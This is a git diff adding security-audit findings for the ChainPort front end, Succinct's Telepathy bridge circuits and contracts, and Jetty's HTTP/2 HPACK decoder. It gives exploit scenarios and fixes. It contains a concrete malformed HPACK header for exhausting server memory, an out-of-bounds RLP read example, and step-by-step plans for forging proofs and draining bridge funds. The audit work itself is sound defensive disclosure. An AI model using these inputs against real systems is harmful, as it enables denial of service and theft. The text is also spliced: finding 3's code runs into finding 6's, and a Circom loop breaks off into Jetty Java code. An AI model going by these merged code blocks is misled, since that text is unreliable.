The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end. +22. Lack of CSP header in the ChainPort front end Severity: Low Difficulty: High Type: Configuration Finding ID: TOB-CHPT-22 Target: The chainport-app repository Description The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker finds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the effects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References ● HTTP Content Security Policy (CSP) ● Google CSP Evaluator ● Google Web Security Fundamentals: Eval ● Google Web Security Fundamentals: Inline code is considered harmful diff --git a/findings_newupdate/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt b/findings_newupdate/tob/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt similarity index 100% rename from findings_newupdate/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt rename to findings_newupdate/tob/2023-02-ryanshea-practicalstealthaddresses-securityreview.txt diff --git a/findings_newupdate/2023-02-solana-token-2022-program-securityreview.txt b/findings_newupdate/tob/2023-02-solana-token-2022-program-securityreview.txt similarity index 100% rename from findings_newupdate/2023-02-solana-token-2022-program-securityreview.txt rename to findings_newupdate/tob/2023-02-solana-token-2022-program-securityreview.txt diff --git a/findings_newupdate/tob/2023-02-succinct-securityreview.txt b/findings_newupdate/tob/2023-02-succinct-securityreview.txt new file mode 100644 index 0000000..e0e0e40 --- /dev/null +++ b/findings_newupdate/tob/2023-02-succinct-securityreview.txt @@ -0,0 +1,14 @@ +1. Prover can lock user funds by including ill-formed BigInts in public key commitment Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-1 Target: circuits/circuits/rotate.circom Description The Rotate circuit does not check for the validity of BigInts included in pubkeysBigIntY . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. The Rotate circuit is designed to prove a translation between an SSZ commitment over a set of validator public keys produced by the Ethereum consensus protocol and a Poseidon commitment over an equivalent list. 
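The 7-limb, 55-bit layout at issue is described below; the following Python sketch shows how the same integer admits both a canonical encoding and an ill-formed one with an oversized limb, mirroring the exploit scenario (the helper names are ours, for illustration only):

    N, K = 55, 7  # 7 limbs of 55 bits each, little-endian

    def to_limbs(x: int) -> list[int]:
        return [(x >> (N * i)) & ((1 << N) - 1) for i in range(K)]

    def from_limbs(limbs: list[int]) -> int:
        return sum(limb << (N * i) for i, limb in enumerate(limbs))

    y = (1 << 60) + 5
    canonical = to_limbs(y)
    malformed = list(canonical)
    malformed[1] -= 1            # borrow one from a higher limb...
    malformed[0] += 1 << N       # ...and add 2^55 to the limb below it
    assert from_limbs(malformed) == y      # same integer value
    assert max(malformed) >= (1 << N)      # but one limb violates the 2^55 bound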
The SSZ commitment is over public keys serialized as 48-byte compressed BLS public keys, specifying an X coordinate and single sign bit, while the Poseidon commitment is over pairs (X, Y), where X and Y are 7-limb, 55-bit BigInts. The prover specifies the Y coordinate for each public key as part of the witness; the Rotate circuit then uses SubgroupCheckG1WithValidX to constrain Y to be valid in the sense that (X, Y) is a point on the BLS12-381 elliptic curve. However, SubgroupCheckG1WithValidX assumes that its input is a properly formed BigInt, with all limbs less than 2^55. This property is not validated anywhere in the Rotate circuit. By committing to a Poseidon root containing invalid BigInts, a malicious prover can prevent other provers from successfully proving a Step operation, bringing the light client to a halt and causing user funds to be stuck in the bridge. Furthermore, the invalid elliptic curve points would then be usable in the Step circuit, where they are passed without validation to the EllipticCurveAddUnequal function. The behavior of this function on ill-formed inputs is not specified and could allow a malicious prover to forge Step proofs without a valid sync committee signature. Figure 1.1 shows where the untrusted pubkeysBigIntY value is passed to the SubgroupCheckG1WithValidX template. /* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */ component isValidPoint[SYNC_COMMITTEE_SIZE]; for (var i = 0; i < SYNC_COMMITTEE_SIZE; i++) { isValidPoint[i] = SubgroupCheckG1WithValidX(N, K); for (var j = 0; j < K; j++) { isValidPoint[i].in[0][j] <== pubkeysBigIntX[i][j]; isValidPoint[i].in[1][j] <== pubkeysBigIntY[i][j]; } } Figure 1.1: telepathy/circuits/circuits/rotate.circom#101–109 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. Instead of using correctly formatted BigInts to represent the Y values of each public key point, she modifies the value by subtracting one from the most significant limb and adding 2^55 to the second-most significant limb. She then posts the resulting proof to the LightClient contract via the rotate function, which updates the sync committee commitment to Alice’s Poseidon commitment containing ill-formed Y coordinates. Future provers would then be unable to use the default witness generator to make new proofs, locking user funds in the bridge. Alice may be able to then exploit invalid assumptions in the Step circuit to forge Step proofs and steal bridge funds. Recommendations Short term, use a Num2Bits component to verify that each limb of the pubkeysBigIntY witness value is less than 2^55. Long term, clearly document and validate the input assumptions of templates such as SubgroupCheckG1WithValidX. Consider adopting Circom signal tags to automate the checking of these assumptions. +2. Prover can lock user funds by supplying non-reduced Y values to G1BigIntToSignFlag Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-2 Target: circuits/circuits/rotate.circom Description The G1BigIntToSignFlag template does not check whether its input is a value properly reduced mod p. A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs.
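As detailed in the next paragraph, the circuit derives the sign of Y by testing whether 2*Y >= p; a small Python sketch (p below is the standard BLS12-381 base-field prime) shows how a non-reduced encoding flips the computed sign:

    # Standard BLS12-381 base-field prime.
    p = 0x1a0111ea397fe69a4b1ba7b6434bacd764774b84f38512bf6730d2a0f6b0f6241eabfffeb153ffffb9feffffffffaaab

    def sign_flag(y: int) -> int:
        # Mirrors G1BigIntToSignFlag: 1 ("negative") iff 2*y >= p.
        return int(2 * y >= p)

    y = 5                          # canonical and positive
    assert sign_flag(y) == 0
    y_bad = y + p                  # same field element, non-reduced encoding
    assert (y_bad - y) % p == 0
    assert sign_flag(y_bad) == 1   # now misread as negative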
During the Rotate proof, when translating compressed public keys to full (X, Y) form, the prover must supply a Y value with a sign corresponding to the sign bit of the compressed public key. The circuit calculates the sign of Y by passing the Y coordinate (supplied by the prover and represented as a BigInt) to the G1BigIntToSignFlag component (figure 2.1). This component determines the sign of Y by checking if 2*Y >= p. However, the correctness of this calculation depends on the Y value being less than p; otherwise, a positive, non-reduced value such as p + 1 will be incorrectly interpreted as negative. A malicious prover could use this fact to commit to a non-reduced form of Y that differs in sign from the correct public key. This invalid commitment would prevent future provers from generating Step circuit proofs and thus halt the LightClient, trapping user funds in the Bridge. template G1BigIntToSignFlag(N, K) { signal input in[K]; signal output out; var P[K] = getBLS128381Prime(); var LOG_K = log_ceil(K); component mul = BigMult(N, K); signal two[K]; for (var i = 0; i < K; i++) { if (i == 0) { two[i] <== 2; } else { two[i] <== 0; } } for (var i = 0; i < K; i++) { mul.a[i] <== in[i]; mul.b[i] <== two[i]; } component lt = BigLessThan(N, K); for (var i = 0; i < K; i++) { lt.a[i] <== mul.out[i]; lt.b[i] <== P[i]; } out <== 1 - lt.out; } Figure 2.1: telepathy/circuits/circuits/bls.circom#197–226 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. When one of the new sync committee members’ public key Y value has a negative sign, Alice substitutes it with 2P - Y. This value is congruent to -Y mod p, and thus has positive sign; however, the G1BigIntToSignFlag component will determine that it has negative sign and validate the inclusion in the Poseidon commitment. Future provers will then be unable to generate proofs from this commitment since the committed public key set does not match the canonical sync committee. Recommendations Short term, constrain the pubkeysBigIntY values to be less than p using BigLessThan. Long term, constrain all private witness values to be in canonical form before use. Consider adopting Circom signal tags to automate the checking of these assumptions. +3. Incorrect handling of point doubling can allow signature forgery Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-3 Target: telepathy/circuits/circuits/bls.circom Description When verifying the sync committee signature, individual public keys are aggregated into an overall public key by repeatedly calling G1Add in a tree structure. Due to the mishandling of elliptic curve point doublings, a minority of carefully selected public keys can cause the aggregation to result in an arbitrary, maliciously chosen public key, allowing signature forgeries and thus malicious light client updates.
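The root cause, detailed below, is that the "unequal add" constraints degenerate when both inputs are the same point; a toy Python check over a small prime (our own illustration, not the circuit's field) makes this concrete:

    p = 101                 # toy prime; the real circuit works mod the BLS12-381 prime
    x1, y1 = 3, 7
    x2, y2 = x1, y1         # point doubling: both inputs are the same point
    for x3 in range(p):
        # (x1 + x2 + x3) * (x2 - x1)^2 - (y2 - y1)^2 == 0 holds for EVERY x3,
        # because both squared differences vanish, leaving 0 == 0.
        assert ((x1 + x2 + x3) * pow(x2 - x1, 2, p) - pow(y2 - y1, 2, p)) % p == 0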
When bit1 and bit2 of G1Add are both set, G1Add computes out by calling EllipticCurveAddUnequal: template parallel G1Add(N, K) { var P[7] = getBLS128381Prime(); signal input pubkey1[2][K]; signal input pubkey2[2][K]; signal input bit1; signal input bit2; /* COMPUTE BLS ADDITION */ signal output out[2][K]; signal output out_bit; out_bit <== bit1 + bit2 - bit1 * bit2; component adder = EllipticCurveAddUnequal(55, 7, P); for (var i = 0; i < 2; i++) { for (var j = 0; j < K; j++) { adder.a[i][j] <== pubkey1[i][j]; adder.b[i][j] <== pubkey2[i][j]; } } Figure 3.1: telepathy/circuits/circuits/bls.circom#82– The results of EllipticCurveAddUnequal are constrained by equations that reduce to 0 = 0 if a and b are equal: // constrain x_3 by CUBIC (x_1 + x_2 + x_3) * (x_2 - x_1)^2 - (y_2 - y_1)^2 = 0 mod p component dx_sq = BigMultShortLong(n, k, 2*n+LOGK+2); // 2k-1 registers abs val < k*2^{2n} component dy_sq = BigMultShortLong(n, k, 2*n+LOGK+2); // 2k-1 registers < k*2^{2n} for (var i = 0; i < k; i++){ dx_sq.a[i] <== b[0][i] - a[0][i]; dx_sq.b[i] <== b[0][i] - a[0][i]; dy_sq.a[i] <== b[1][i] - a[1][i]; dy_sq.b[i] <== b[1][i] - a[1][i]; } [...] component cubic_mod = SignedCheckCarryModToZero(n, k, 4*n + LOGK3, p); [...] for (var i = 0; i < NUM_HASHERS; i++) { [...] if (i > 0) { POSEIDON_SIZE = 16; } hashers[i] = Poseidon(POSEIDON_SIZE); for (var j = 0; j < 15; j++) { if (i * 15 + j >= LENGTH) { hashers[i].inputs[j] <== 0; } else { hashers[i].inputs[j] <== in[i*15 + j]; } } if (i > 0) { hashers[i].inputs[15] <== hashers[i-1].out; } } out <== hashers[NUM_HASHERS-1].out; } Figure 6.1: telepathy/circuits/circuits/poseidon.circom#25–51 The Poseidon authors recommend using a sponge construction, which has better provable security properties than the MD construction. One could implement a sponge by using PoseidonEx with nOuts = 1 for intermediate calls and nOuts = 2 for the final call. For each call, out[0] should be passed into the initialState of the next PoseidonEx component, and out[1] should be used for the final output. By maintaining out[0] as hidden capacity, the overall construction will closely approximate a pseudorandom function. Although the MD construction offers sufficient protection against collision for the current commitment use case, hash functions constructed in this manner do not fully model random functions. Future uses of the PoseidonFieldArray circuit may expect stronger cryptographic properties, such as resistance to length extension. Additionally, by utilizing the initialState input, as shown in figure 6.2, on each permutation call, 16 inputs can be compressed per template instantiation, as opposed to the current 15, without any additional cost per compression. This will reduce the number of compressions required and thus reduce the size of the circuit. template PoseidonEx(nInputs, nOuts) { signal input inputs[nInputs]; signal input initialState; signal output out[nOuts]; Figure 6.2: circomlib/circuits/poseidon.circom#67–70 Recommendations Short term, convert PoseidonFieldArray to use a sponge construction, ensuring that out[0] is preserved as a hidden capacity value. Long term, ensure that all hashing primitives are used in accordance with the published recommendations. +7.
Merkle root reconstruction is vulnerable to forgery via proofs of incorrect length Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SUCCINCT-7 Target: contracts/src/libraries/SimpleSerialize.sol Description The TargetAMB contract accepts and verifies Merkle proofs that a particular smart contract event was issued in a particular Ethereum 2.0 beacon block. Because the proof validation depends on the length of the proof rather than the index of the value to be proved, Merkle proofs with invalid lengths can be used to mislead the verifier and forge proofs for nonexistent transactions. The SSZ.restoreMerkleRoot function reconstructs a Merkle root from the user-supplied transaction receipt and Merkle proof; the light client then compares the root against the known-good value stored in the LightClient contract. The index argument to restoreMerkleRoot determines the specific location in the block state tree at which the leaf node is expected to be found. The arguments leaf and branch are supplied by the prover, while the index argument is calculated by the smart contract verifier. function restoreMerkleRoot(bytes32 leaf, uint256 index, bytes32[] memory branch) internal pure returns (bytes32) { bytes32 value = leaf; for (uint256 i = 0; i < branch.length; i++) { if ((index / (2 ** i)) % 2 == 1) { value = sha256(bytes.concat(branch[i], value)); } else { value = sha256(bytes.concat(value, branch[i])); } } return value; } Figure 7.1: telepathy/contracts/src/libraries/SimpleSerialize.sol#24–38 A malicious user may supply a proof (i.e., a branch list) that is longer or shorter than the number of bits in the index. In this case, the leaf value will not in fact correspond to the receiptRoot but to some other value in the tree. In particular, the user can convince the smart contract that receiptRoot is the value at any generalized index given by truncating the leftmost bits of the true index or by extending the index by arbitrarily many zeroes following the leading set bit. If one of these alternative indexes contains data controllable by the user, who may for example be the block proposer, then the user can forge a proof for a transaction that did not occur and thus steal funds from bridges relying on the TargetAMB. Exploit Scenario Alice, a malicious ETH2.0 validator, encodes a fake transaction receipt hash encoding a deposit to a cross-chain bridge into the graffiti field of a BeaconBlock. She then waits for the block to be added to the HistoricalBlocks tree and further for the generalized index of the historical block to coincide with an allowable index for the Merkle tree reconstruction. She then calls executeMessageFromLog with the transaction receipt, allowing her to withdraw from the bridge based on a forged proof of deposit and steal funds. Recommendations Short term, rewrite restoreMerkleRoot to loop over the bits of index, e.g., with a while loop terminating when index == 1. Long term, ensure that proof verification routines do not use control flow determined by untrusted input. The verification routine for each statement to be proven should treat all possible proofs uniformly.
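A direct Python port of the loop makes the problem concrete: the reconstruction is driven by the attacker-chosen proof length rather than by the bits of index (the byte values below are arbitrary placeholders):

    import hashlib

    def restore_merkle_root(leaf: bytes, index: int, branch: list[bytes]) -> bytes:
        value = leaf
        for i, node in enumerate(branch):  # iterates over the PROOF, not the index bits
            if (index >> i) & 1:
                value = hashlib.sha256(node + value).digest()
            else:
                value = hashlib.sha256(value + node).digest()
        return value

    leaf, s0, s1, s2 = (bytes([b]) * 32 for b in (0x11, 0x22, 0x33, 0x44))
    root = restore_merkle_root(leaf, 2, [s0, s1])
    # An over-long proof is accepted for the same index and binds the leaf at a
    # different generalized index, yielding a different, attacker-steered root.
    assert restore_merkle_root(leaf, 2, [s0, s1, s2]) != root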
+8. LightClient forced finalization could allow bad updates in case of a DoS Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-SUCCINCT-8 Target: contracts/src/lightclient/LightClient.sol Description Under periods of delayed finality, the LightClient may finalize block headers with few validators participating. If the Telepathy provers were targeted by a denial-of-service (DoS) attack, this condition could be triggered and used by a malicious validator to take control of the LightClient and finalize malicious block headers. The LightClient contract typically considers a block header to be finalized if it is associated with a proof that more than two-thirds of sync committee participants have signed the header. Typically, the sync committee for the next period is determined from a finalized block in the current period. However, in the case that the end of the sync committee period is reached before any block containing a sync committee update is finalized, a user may call the LightClient.force function to apply the update with the most signatures, even if that update has less than a majority of signatures. A forced update may have as few as 10 participating signers, as determined by the constant MIN_SYNC_COMMITTEE_PARTICIPANTS. /// @notice In the case there is no finalization for a sync committee rotation, this method /// is used to apply the rotate update with the most signatures throughout the period. /// @param period The period for which we are trying to apply the best rotate update for. function force(uint256 period) external { LightClientRotate memory update = bestUpdates[period]; uint256 nextPeriod = period + 1; if (update.step.finalizedHeaderRoot == 0) { revert("Best update was never initialized"); } else if (syncCommitteePoseidons[nextPeriod] != 0) { revert("Sync committee for next period already initialized."); } else if (getSyncCommitteePeriod(getCurrentSlot()) < nextPeriod) { revert("Must wait for current sync committee period to end."); } setSyncCommitteePoseidon(nextPeriod, update.syncCommitteePoseidon); } Figure 8.1: telepathy/contracts/src/lightclient/LightClient.sol#123– Proving sync committee updates via the rotate ZK circuit requires significant computational power; it is likely that there will be only a few provers online at any given time. In this case, a DoS attack against the active provers could cause the provers to be offline for a full sync committee period (~27 hours), allowing the attacker to force an update with a small minority of validator stake. The attacker would then gain full control of the light client and be able to steal funds from any systems dependent on the correctness of the light client. Exploit Scenario Alice, a malicious ETH2.0 validator, controls about 5% of the total validator stake, split across many public keys. She waits for a sync committee period in which the committee includes at least 10 of her public keys, then launches a DoS against the active Telepathy provers, using an attack such as that described in TOB-SUCCINCT-1 or an attack against the offchain prover/relayer client itself. Alice creates a forged beacon block with a new sync committee containing only her own public keys, then uses her 10 active committee keys to sign the block. She calls LightClient.rotate with this forged block and waits until the sync committee period ends, finally calling LightClient.force to gain control over all future light client updates. Recommendations Short term, consider removing the LightClient.force function, extending the waiting period before updates may be forced, or introducing a privileged role to mediate forced updates. Long term, explicitly document expected liveness behavior and associated safety tradeoffs. +9.
G1AddMany does not check for the point at infinity Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-9 Target: circuits/circuits/{sync_committee.circom, bls.circom} Description The G1AddMany circuit aggregates multiple public keys into a single public key before verifying the BLS signature. The outcome of the aggregation is used within CoreVerifyPubkeyG1 as the public key. However, G1AddMany ignores the value of the final out_bits, and wrongly converts a point at infinity to a different point when all participation bits are zero. template G1AddMany(SYNC_COMMITTEE_SIZE, LOG_2_SYNC_COMMITTEE_SIZE, N, K) { signal input pubkeys[SYNC_COMMITTEE_SIZE][2][K]; signal input bits[SYNC_COMMITTEE_SIZE]; signal output out[2][K]; [...] for (var i = 0; i < 2; i++) { for (var j = 0; j < K; j++) { out[i][j] <== reducers[LOG_2_SYNC_COMMITTEE_SIZE-1].out[0][i][j]; } } } Figure 9.1: BLS key aggregation without checks for all-zero participation bits (telepathy/circuits/circuits/bls.circom#16–48) Recommendations Short term, augment the G1AddMany template with an output signal that indicates whether the aggregated public key is the point at infinity. Check that the aggregated public key is non-zero in the calling circuit by verifying that the output of G1AddMany is not the point at infinity (for instance, in VerifySyncCommitteeSignature). Long term, assert that all provided elliptic curve points are non-zero before converting them to affine form and using them where a non-zero point is expected. +10. TargetAMB receipt proof may behave unexpectedly on future transaction types Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-10 Target: contracts/src/libraries/StateProofHelper.sol Description The TargetAMB contract can relay transactions from the SourceAMB via events logged in transaction receipts. The contract currently ignores the version specifier in these receipts, which could cause unexpected behavior in future upgrade hard-forks. To relay a transaction from a receipt, the user provides a Merkle proof that a particular transaction receipt is present in a specified block; the relevant event is then parsed from the transaction receipt by the TargetAMB. function getEventTopic(...){ ... bytes memory value = MerklePatriciaProofVerifier.extractProofValue(receiptRoot, key, proofAsRLP); RLPReader.RLPItem memory valueAsItem = value.toRlpItem(); if (!valueAsItem.isList()) { // TODO: why do we do this ... valueAsItem.memPtr++; valueAsItem.len--; } RLPReader.RLPItem[] memory valueAsList = valueAsItem.toList(); require(valueAsList.length == 4, "Invalid receipt length"); // In the receipt, the 4th entry is the logs RLPReader.RLPItem[] memory logs = valueAsList[3].toList(); require(logIndex < logs.length, "Log index out of bounds"); RLPReader.RLPItem[] memory relevantLog = logs[logIndex].toList(); ... } Figure 10.1: telepathy/contracts/src/libraries/StateProofHelper.sol#L44–L82 The logic in figure 10.1 checks if the transaction receipt is an RLP list; if it is not, the logic skips one byte of the receipt before continuing with parsing. This logic is required in order to properly handle legacy transaction receipts as defined in EIP-2718.
Legacy transaction receipts directly contain the RLP-encoded list rlp([status, cumulativeGasUsed, logsBloom, logs]), whereas EIP-2718 receipts take the form TransactionType || TransactionPayload, where TransactionType is a one-byte indicator between 0x00 and 0x7f and TransactionPayload may vary depending on the transaction type. Current valid transaction types are 0x01 and 0x02. New transaction types may be added during routine Ethereum upgrade hard-forks. The TransactionPayload field of type 0x01 and 0x02 transactions corresponds exactly to the LegacyTransactionReceipt format; thus, simply skipping the initial byte is sufficient to handle these cases. However, EIP-2718 does not guarantee this backward compatibility, and future hard-forks may introduce transaction types for which this parsing method gives incorrect results. Because the current implementation lacks explicit validation of the transaction type, this discrepancy may go unnoticed and lead to unexpected behavior. Exploit Scenario An Ethereum upgrade fork introduces a new transaction type with a corresponding transaction receipt format that differs from the legacy format. If the new format has the same number of fields but with different semantics in the fourth slot, it may be possible for a malicious user to insert into that slot a value that parses as an event log for a transaction that did not take place, thus forging an arbitrary bridge message. Recommendations Short term, check the first byte of valueAsItem against a list of allowlisted transaction types, and revert if the transaction type is invalid. Long term, plan for future incompatibilities due to upgrade forks; for example, consider adding a semi-trusted role responsible for adding new transaction type identifiers to an allowlist. +11. RLPReader library does not validate proper RLP encoding Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-11 Target: contracts/lib/Solidity-RLP/RLPReader.sol Description The TargetAMB uses the external RLPReader dependency to parse RLP-encoded nodes in the Ethereum state trie, including those provided by the user as part of a Merkle proof. When parsing a byte string as an RLPItem, the library does not check that the encoded payload length of the RLPItem matches the length of the underlying bytes. /* * @param item RLP encoded bytes */ function toRlpItem(bytes memory item) internal pure returns (RLPItem memory) { uint256 memPtr; assembly { memPtr := add(item, 0x20) } return RLPItem(item.length, memPtr); } Figure 11.1: Solidity-RLP/contracts/RLPReader.sol#51–61 If the encoded byte length of the RLPItem is too long or too short, future operations on the RLPItem may access memory before or after the bounds of the underlying buffer. More generally, because the Merkle trie verifier assumes that all input is in the form of valid RLP-encoded data, it is important to check that potentially malicious data is properly encoded. While we did not identify any way to convert improperly encoded proof data into a proof forgery, it is simple to give an example of an out-of-bounds read that could possibly lead in other contexts to unexpected behavior. In figure 11.2, the result of items[0].toBytes() contains many bytes read from memory beyond the bounds allocated in the initial byte string.
RLPReader.RLPItem memory item = RLPReader.toRlpItem('\xc3\xd0'); RLPReader.RLPItem[] memory items = item.toList(); assert(items[0].toBytes().length == 16); Figure 11.2: Out-of-bounds read due to invalid RLP encoding In this example, RLPReader.toRLPItem should revert because the encoded length of three bytes is longer than the payload length of the string; similarly, the call to toList() should fail because the nested RLPItem encodes a length of 16, again more than the underlying buffer. To prevent such ill-constructed nested RLPItems, the internal numItems function should revert if currPtr is not exactly equal to endPtr at the end of the loop shown in figure 11.3. // @return number of payload items inside an encoded list. function numItems(RLPItem memory item) private pure returns (uint256) { if (item.len == 0) return 0; uint256 count = 0; uint256 currPtr = item.memPtr + _payloadOffset(item.memPtr); uint256 endPtr = item.memPtr + item.len; while (currPtr < endPtr) { currPtr = currPtr + _itemLength(currPtr); // skip over an item count++; } return count; } Figure 11.3: Solidity-RLP/contracts/RLPReader.sol#256–269 Recommendations Short term, add a check in RLPReader.toRLPItem that validates that the length of the argument exactly matches the expected length of prefix + payload based on the encoded prefix. Similarly, add a check in RLPReader.numItems, checking that the sum of the encoded lengths of sub-objects matches the total length of the RLP list. Long term, treat any length values or pointers in untrusted data as potentially malicious and carefully check that they are within the expected bounds. +12. TargetAMB _executeMessage lacks contract existence checks Severity: Low Difficulty: Low Type: Error Reporting Finding ID: TOB-SUCCINCT-12 Target: contracts/src/amb/TargetAMB.sol Description When relaying messages on the target chain, the TargetAMB records the success or failure of the external contract call so that off-chain clients can track the success of their messages. However, if the recipient of the call is an externally owned account or is otherwise empty, the handleTelepathy call will appear to have succeeded when it was not processed by any recipient. bytes memory recieveCall = abi.encodeWithSelector( ITelepathyHandler.handleTelepathy.selector, message.sourceChainId, message.senderAddress, message.data ); address recipient = TypeCasts.bytes32ToAddress(message.recipientAddress); (status,) = recipient.call(recieveCall); if (status) { messageStatus[messageRoot] = MessageStatus.EXECUTION_SUCCEEDED; } else { messageStatus[messageRoot] = MessageStatus.EXECUTION_FAILED; } Figure 12.1: telepathy/contracts/src/amb/TargetAMB.sol#150–164 Exploit Scenario A user accidentally sends a transaction to the wrong address or an address that does not exist on the target chain. The UI displays the transaction as successful, possibly confusing the user further. Recommendations Short term, change the handleTelepathy interface to expect a return value and check that the return value is some magic constant, such as the four-byte ABI selector. See OpenZeppelin’s safeTransferFrom / IERC721Receiver pattern for an example. Long term, ensure that all low-level calls behave as expected when handling externally owned accounts. +13. LightClient is unable to verify some block headers Severity: Medium Difficulty: Low Type: Authentication Finding ID: TOB-SUCCINCT-13 Target: contracts/src/lightclient/LightClient.sol This issue was discovered and relayed to the audit team by the Telepathy developers.
We include it here for completeness and to provide our fix recommendations. Description The LightClient contract expects beacon block headers produced in a period prior to the period in which they are finalized to be signed by the wrong sync committee; those blocks will not be validated by the LightClient, and AMB transactions in these blocks may be delayed. The Telepathy light client tracks only block headers that are “finalized,” as defined by the ETH2.0 Casper finality mechanism. Newly proposed, unfinalized beacon blocks contain a finalized_checkpoint field with the most recently finalized block hash. The Step circuit currently exports only the slot number of this nested, finalized block as a public input. The LightClient contract uses this slot number to determine which sync committee it expects to sign the update. However, the correct slot number for this use is in fact that of the wrapping, unfinalized block. In some cases, such as near the edge of a sync committee period or during periods of delayed finalization, the two slots may not belong to the same sync committee period. In this case, the signature will fail to verify, and the LightClient will become unable to validate the block header. Exploit Scenario A user sends an AMB message using the SourceAMB.sendViaLog function. The beacon block in which this execution block is included is late within a sync committee period and is not finalized on the beacon chain until the next period. The new sync committee signs the block, but this signature is rejected by the light client because it expects a signature from the old committee. Because this header cannot be finalized in the light client, the TargetAMB cannot relay the message until some future block in the new sync committee period is finalized in the light client, causing delivery delays. Recommendations Short term, include attestedSlot in the public input commitment to the Step circuit. This can be achieved at no extra cost by packing the eight-byte attestedSlot value alongside the eight-byte finalizedSlot value, which currently is padded to 32 bytes. Long term, add additional unit and end-to-end tests to focus on cases where blocks are near the edges of epochs and sync committee periods. Further, reduce gas usage and circuit complexity by packing all public inputs to the step function into a single byte array that is hashed in one pass, rather than chaining successive calls to SHA-256, which reduces the effective rate by half and incurs overhead due to the additional external precompile calls. +14. OptSimpleSWU2 Y-coordinate output is underconstrained Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-14 Target: circuits/circuits/pairing/bls12_381_hash_to_G2.circom Description The OptSimpleSWU2 circuit does not check that its Y-coordinate output is a properly formatted BigInt. This violates the canonicity assumptions of the Fp2Sgn0 circuit and other downstream components, possibly leading to unexpected nondeterminism in the sign of the output of MapToG2. Incorrect results from MapToG2 would cause the circuit to verify the provided signature against a message different from that in the public input. While this does not allow malicious provers to forge signatures on arbitrary messages, this additional degree of freedom in witness generation could interact negatively with future changes to the codebase or instantiations of this circuit. var Y[2][50]; ...
component Y_sq = Fp2Multiply(n, k, p); // Y^2 == g(X)
for (var i = 0; i < 2; i++)
    for (var idx = 0; idx ...

public void checkSize(int length, boolean huffman) throws SessionException
{
    // Apply a huffman fudge factor
    if (huffman)
        length = (length * 4) / 3;
    if ((_size + length) > _maxSize)
        throw new HpackException.SessionException("Header too large %d > %d", _size + length, _maxSize);
}

Figure 1.1: MetaDataBuilder.checkSize

However, when the value of length is very large and huffman is true, the multiplication of length by 4 in line 295 will overflow, and length will become negative. This will cause the result of the sum of _size and length to be negative, and the check on line 296 will not be triggered.

Exploit Scenario
An attacker repeatedly sends HTTP messages with the HPACK header 0x00ffffffffff02. Each time this header is decoded, the following occurs:
● HpackDecode.decode determines that a Huffman-coded value of length 805306494 needs to be decoded.
● MetaDataBuilder.checkSize approves this length.
● Huffman.decode allocates a 1.6 GB string array.
● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by appending valid Huffman-coded characters to the end of the header.)
Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory.

Recommendations
Short term, have MetaDataBuilder.checkSize check that length is below a threshold before performing the multiplication.
Long term, use fuzzing to check for similar errors; we found this issue by fuzzing HpackDecode.
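A related hardening, shown below as a minimal sketch rather than Jetty's actual fix, is to perform the fudge-factor arithmetic in 64-bit space so that the int multiplication can never wrap; the field and exception names mirror figure 1.1, and the surrounding class context is assumed.

public void checkSize(int length, boolean huffman) throws SessionException
{
    // Reject nonsensical lengths outright.
    if (length < 0)
        throw new HpackException.SessionException("Invalid header length %d", length);

    // Compute the Huffman fudge factor in 64 bits: (long)length * 4 cannot
    // overflow for any int input, so the adjusted value can never wrap negative.
    long adjusted = huffman ? ((long)length * 4) / 3 : length;

    if (_size + adjusted > _maxSize)
        throw new HpackException.SessionException("Header too large %d > %d", _size + adjusted, _maxSize);
}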
+2. Cookie parser accepts unmatched quotation marks
Severity: Informational
Difficulty: High
Type: Error Reporting
Finding ID: TOB-JETTY-2
Target: org.eclipse.jetty.http.RFC6265CookieParser

Description
The RFC6265CookieParser.parseField function does not check for unmatched quotation marks. For example, parseField("\"") will execute without raising an exception. This issue is unlikely to lead to any vulnerabilities, but it could lead to problems if users or developers expect the function to accept only valid strings.

Recommendations
Short term, modify the function to check that the state at the end of the given string is not IN_QUOTED_VALUE.
Long term, when using a state machine, ensure that the code always checks that the state is valid before exiting.

+3. Errant command quoting in CGI servlet
Severity: High
Difficulty: High
Type: Data Validation
Finding ID: TOB-JETTY-3
Target: org.eclipse.jetty.ee10.servlets.CGI, org.eclipse.jetty.ee9.servlets.CGI

Description
